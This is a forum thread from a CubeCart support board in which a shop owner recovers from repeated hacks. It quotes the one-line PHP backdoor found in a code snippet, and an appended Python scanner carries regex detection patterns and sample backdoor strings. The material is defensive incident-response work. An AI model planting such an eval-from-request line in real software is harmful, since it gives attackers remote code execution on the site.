QuotesUK Posted October 6, 2015

I have a v5 installation that was compromised by the recent security flaw. I want to upgrade to v6 and be sure that the site is purged of any hidden files left by the hacker. Which approach would you recommend:

1/ rollback to a safe backup, lose all new customer data, then upgrade
2/ upgrade with compromised site, delete all CubeCart files, then upload files from latest .zip installation pack

Am I right to assume that the method in (2) will work?
bsmither Posted October 6, 2015

Save only images from /images/source/, save the /includes/global.inc.php, save only logos from /images/logos/, and if you have a custom skin, save that.

In admin, Manage Hooks, Code Snippets tab, delete snippets you don't recognize.

Then nuke the site.

Upload the CC6 package. Copy back the global.inc.php file. Copy back the images. Copy back your custom skin.

Let CC6 UPGRADE the database.
QuotesUK Posted October 6, 2015

Then nuke the site ... it's the only way to be sure.

Your instructions were excellent.

After upgrading I changed the database password on the server, and in the global.inc.php file. I also changed all the admin passwords. I made a small tweak to the logo skin allocation settings. The payment/shipping options weren't carried over, but installing new plugins was straightforward.

As always, hugely grateful for your support.
QuotesUK Posted November 7, 2015

Unfortunately, the site was hacked again by the same people.

It appears there was something still lurking in either the database or the skin files.

Is there any way to export product listings data, for example to XML, so that I can do a completely fresh install?
bsmither Posted November 7, 2015

Are you running CC607 or better? Did you delete any Code Snippets you did not recognize?

If there is something in the database, and you want to back up some or all of that database, then you won't know if that something also got into the backup.
QuotesUK Posted November 7, 2015

Yes. When I purged the old site (v5.2.9) I upgraded all the way to v6.0.8.

There weren't any hooks or code snippets to remove - just the one snippet that I left in called snippetABCd1 ... <?php eval($_REQUEST["ABCd1"]);?> which I see across all my CubeCart installs, except the ABCd1 bit changes from site to site. I assume this snippet is common to everyone?
bsmither Posted November 7, 2015

No. That is the snippet that is allowing backdoor access. The eval(...) is the key thing to look for.

Delete it.

Then, to make sure, use phpMyAdmin to look at the database table CubeCart_code_snippet to make sure it is completely empty.

Then, look at CubeCart_hooks and verify that, if you have no plugins installed, there are no hooks registered there. Then look in the folder /includes/extra/ and delete all files that begin with snippet_.
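As an added example (not code from either poster or from CubeCart), the check above can be scripted: scan exported CubeCart_code_snippet rows and the snippet_*.php files under /includes/extra/ for the eval-from-request shape seen in this thread, plus the usual decoder-wrapped variants. The row column names (name, hook_trigger, php_code) and the sample rows are assumptions constructed for this example, not the real schema.

```python
import re
import tempfile
from pathlib import Path

# Shapes of the one-line PHP backdoor discussed in this thread: eval() fed
# straight from a request superglobal, or from an obfuscation decoder.
# These regexes are constructed for this example.
SUSPICIOUS = {
    "eval-from-request": re.compile(r'eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b', re.I),
    "eval-of-decoder": re.compile(r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(', re.I),
    "assert-from-request": re.compile(r'assert\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b', re.I),
}

def scan_code(code: str) -> list[str]:
    """Return the names of the suspicious patterns found in one chunk of PHP."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(code)]

def scan_snippet_rows(rows: list[dict]) -> list[dict]:
    """Check rows exported from CubeCart_code_snippet (e.g. via phpMyAdmin).
    Column names name/hook_trigger/php_code are assumed for this example."""
    return [
        {"name": r["name"], "trigger": r["hook_trigger"], "hits": hits}
        for r in rows if (hits := scan_code(r["php_code"]))
    ]

def scan_extra_dir(extra_dir: Path) -> dict[str, list[str]]:
    """Check every snippet_*.php file in the given /includes/extra/ directory."""
    findings = {}
    for f in sorted(extra_dir.glob("snippet_*.php")):
        if hits := scan_code(f.read_text(errors="replace")):
            findings[f.name] = hits
    return findings

if __name__ == "__main__":
    # Constructed sample rows: one shaped like the thread's backdoor, one benign.
    rows = [
        {"name": "snippetABCd1", "hook_trigger": "controller.index",
         "php_code": '<?php eval($_REQUEST["ABCd1"]);?>'},
        {"name": "clean", "hook_trigger": "example.hook",   # placeholder trigger
         "php_code": '<?php $GLOBALS["seen"] = true;'},
    ]
    print(scan_snippet_rows(rows))   # flags only snippetABCd1
    with tempfile.TemporaryDirectory() as d:   # constructed stand-in for /includes/extra/
        (Path(d) / "snippet_x.php").write_text('<?php eval(base64_decode("ZWNobyAx"));')
        print(scan_extra_dir(Path(d)))   # flags snippet_x.php as eval-of-decoder
```

A hit is a reason to inspect and remove, not proof by itself; an empty result does not clear a site, since a backdoor can also live in skin templates or other PHP files, which is why the advice above is to wipe and reinstall.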
QuotesUK Posted November 7, 2015

Oh no! I have to kick myself for that one.

It says the trigger is "controller.index".
bsmither Posted November 7, 2015

That trigger gets called 99% of the time, and early in the CubeCart wake-up sequence.
QuotesUK Posted November 7, 2015

Fortunately I did a backup after completing my purge/upgrade, so I have something decent to fall back onto.

After completing the rollback I will delete the snippet, switch to a new skin and dispose of the old, and then carry out a visual review of what is stored in the database.

Thank you bsmither.